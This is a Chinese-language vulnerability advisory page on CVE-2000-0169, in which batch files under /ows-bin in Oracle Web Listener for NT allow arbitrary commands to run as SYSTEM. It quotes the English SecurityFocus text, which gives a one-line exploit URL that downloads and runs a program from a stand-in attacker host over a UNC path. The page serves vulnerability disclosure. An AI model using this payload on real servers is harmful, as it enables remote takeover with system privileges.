Oracle Web Listener批处理文件可用来远程执行任意命令漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105752 漏洞类型 输入验证
发布时间 2000-03-15 更新时间 2006-04-07
CVE编号 CVE-2000-0169 CNNVD-ID CNNVD-200003-032
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/19809
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200003-032
|漏洞详情
OracleWebServer是一个与Oracle7Server紧密集成的HTTP服务器,能够由存储在Oracle数据库的数据建立动态HTML文件。OracleWebListener是其组件之一,接收使用任何浏览器的用户发出的请求。对于静态(基于文件的)页面请求被监听进程立即处理,其功能即是一个HTTP服务器。OracleWebListenerforNT在安装了OAS后,缺省设置下,/ows-bin目录(映射到C:\orant\ows\4.0\bin)下安装了一些批处理文件,这些文件能被攻击者用来在服务器上执行任意命令。攻击者只需要在批处理文件的后面增加"?&"字符串,以及要执行的命令即可。这些命令将在"SYSTEM"级别运行。攻击者甚至不需要知道确切的批处理文件的名称,用'*'通配符就可以匹配目录下所有的批处理文件。另外,攻击者也可以用UNC(UniversalNamingConversion)路径(例如:\\attacker.com\getadmin.exe)下载并执行远程主机上的程序。<*链接:http://www.cerberus-infosec.co.uk/advisories.shtml*>
|漏洞EXP
source: http://www.securityfocus.com/bid/1053/info

Oracle Web Listener for NT makes use of various batch files as cgi scripts, which are stored in the /ows-bin/ directory by default. 

Any of these batch files can be used to run arbitrary commands on the server, simply by appending '?&' and a command to the filename. The command will be run at the SYSTEM level. The name of a batch file is not even neccessary, as it will translate the '*' character and apply the appended string to every batch file in the directory. Moreover, UNC paths can be used to cause the server to download and execute remote code.

http: //target/ows-bin/*.bat?&\\attacker\getadmin.bat
|参考资料

来源:BID
名称:1053
链接:http://www.securityfocus.com/bid/1053
来源:NTBUGTRAQ
名称:20000314OracleWebListener4.0.x
链接:http://archives.neohapsis.com/archives/ntbugtraq/2000-q1/0211.html
来源:NSFOCUS
名称:390
链接:http://www.nsfocus.net/vulndb/390